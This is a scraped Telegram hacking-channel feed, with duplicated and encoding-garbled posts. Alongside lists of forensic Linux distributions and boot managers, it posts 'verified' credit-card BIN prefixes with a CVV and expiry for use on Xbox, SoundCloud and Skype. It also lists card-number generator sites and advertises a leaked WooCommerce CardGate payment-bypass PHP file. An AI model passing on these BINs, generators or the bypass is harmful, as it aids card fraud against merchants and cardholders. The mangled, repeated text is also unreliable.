π¦ New 2020 Linux Distributions-Good for any Linux developer :
[The Appliance for Digital Investigation and Analysis (ADIA)](https://forensics.cert.org/#ADIA) - VMware-based appliance used for digital investigation and acquisition and is built entirely from public domain software. Among the tools contained in ADIA are Autopsy, the Sleuth Kit, the Digital Forensics Framework, log2timeline, Xplico, and Wireshark. Most of the system maintenance uses Webmin. It is designed for small-to-medium sized digital investigations and acquisitions. The appliance runs under Linux, Windows, and Mac OS. Both i386 (32-bit) and x86_64 (64-bit) versions are available.
Computer Aided Investigative Environment (CAINE) - Contains numerous tools that help investigators during their analysis, including forensic evidence collection.
[CCF-VM](https://github.com/rough007/CCF-VM) - CyLR CDQR Forensics Virtual Machine (CCF-VM): An all-in-one solution to parsing collected data, making it easily searchable with built-in common searches, enable searching of single and multiple hosts simultaneously.
Digital Evidence & Forensics Toolkit (DEFT) - Linux distribution made for computer forensic evidence collection. It comes bundled with the Digital Advanced Response Toolkit (DART) for Windows. A light version of DEFT, called DEFT Zero, is also available, which is focused primarily on forensically sound evidence collection.
[NST - Network Security Toolkit](https://sourceforge.net/projects/nst/files/latest/download?source=files) - Linux distribution that includes a vast collection of best-of-breed open source network security applications useful to the network security professional.
PALADIN - Modified Linux distribution to perform various forenics task in a forensically sound manner. It comes with many open source forensics tools included.
[Security Onion](https://github.com/Security-Onion-Solutions/security-onion) - Special Linux distro aimed at network security monitoring featuring advanced analysis tools.
SANS Investigative Forensic Toolkit (SIFT) Workstation - Demonstrates that advanced incident response capabilities and deep dive digital forensic techniques to intrusions can be accomplished using cutting-edge open-source tools that are freely available and frequently updated.
Enjoyβ€οΈππ»
β 2020 git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
Carnegie Mellon University's Software Engineering Institute
Digital Forensics: Advancing Solutions for Today's Escalating Cybercrime
As cybercrime proliferates, CERT researchers help law enforcement investigators process digital evidence with courses, methodologies and tools, skills, and experience.
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Some Verified Bin- from few days :
β Bin For XBoxβ :
Bin : 4095890041xxxxxx
CVV/Date: RND
IP : USAπΊπΈ
β Bin For SoundCloud Goβ
Bin : 5422175006xxxxxx
Date: 05/21
CVV : 917
IP : USA πΊπΈ
βBin For Skype β
Bin : 515462003565xxxx
CVV/Date: RND
IP : USA πΊπΈ
βCc GENETRATORS
> https://t.me/UNDERCODEHACKING/2150
Enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Some Verified Bin- from few days :
β Bin For XBoxβ :
Bin : 4095890041xxxxxx
CVV/Date: RND
IP : USAπΊπΈ
β Bin For SoundCloud Goβ
Bin : 5422175006xxxxxx
Date: 05/21
CVV : 917
IP : USA πΊπΈ
βBin For Skype β
Bin : 515462003565xxxx
CVV/Date: RND
IP : USA πΊπΈ
βCc GENETRATORS
> https://t.me/UNDERCODEHACKING/2150
Enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
Telegram
UNDERCODE HACKING
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦57 New cc generator list
1) https://namso-gen.com
2) http://namso.ezyro.com/?i=1
3) http://archive.li/gvfdN
4) https://ia1000.com
6) http://sourcebinccgen.ml/CCGENSBC1/
7) http://sourcebinccgen.ml/CCGENSBC2/
8) https://obtainβ¦
π¦57 New cc generator list
1) https://namso-gen.com
2) http://namso.ezyro.com/?i=1
3) http://archive.li/gvfdN
4) https://ia1000.com
6) http://sourcebinccgen.ml/CCGENSBC1/
7) http://sourcebinccgen.ml/CCGENSBC2/
8) https://obtainβ¦
Wordpress Payment BUG 2020 .php
6.2 KB
WordPress Plugin WooCommerce CardGate Payment Gateway 3.1.15 - Payment Process Bypass
- Leak & Uploaded to Db-
- Leak & Uploaded to Db-
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦BEST MULTI PC BOOT SOFTWARES 2020 :
> Grub bOOT
https://www.gnu.org/software/grub/
> refind
https://sourceforge.net/projects/refind/
> Visual BCD Editor
https://visual-bcd-editor.en.softonic.com/#:~:text=Author's%20review-,Visual%20BCD%20Editor%20is%20an%20advanced%20GUI%20version%20of%20Windows,Every%20property%20is%20editable.
> Libreboot
https://libreboot.org/
> coreboot
https://www.coreboot.org/
> GAG
https://sourceforge.net/projects/gag/
> gummiboot
https://pkgs.org/download/gummiboot β (avaible for pc & androids apk...)
π¦There is More But Those Top Rated in 2020
Enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦BEST MULTI PC BOOT SOFTWARES 2020 :
> Grub bOOT
https://www.gnu.org/software/grub/
> refind
https://sourceforge.net/projects/refind/
> Visual BCD Editor
https://visual-bcd-editor.en.softonic.com/#:~:text=Author's%20review-,Visual%20BCD%20Editor%20is%20an%20advanced%20GUI%20version%20of%20Windows,Every%20property%20is%20editable.
> Libreboot
https://libreboot.org/
> coreboot
https://www.coreboot.org/
> GAG
https://sourceforge.net/projects/gag/
> gummiboot
https://pkgs.org/download/gummiboot β (avaible for pc & androids apk...)
π¦There is More But Those Top Rated in 2020
Enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
www.gnu.org
GNU GRUB
GNU GRUB is a Multiboot boot loader. It was derived from GRUB, the GRand Unified Bootloader, which was originally designed and implemented by Erich Stefan Boleyn.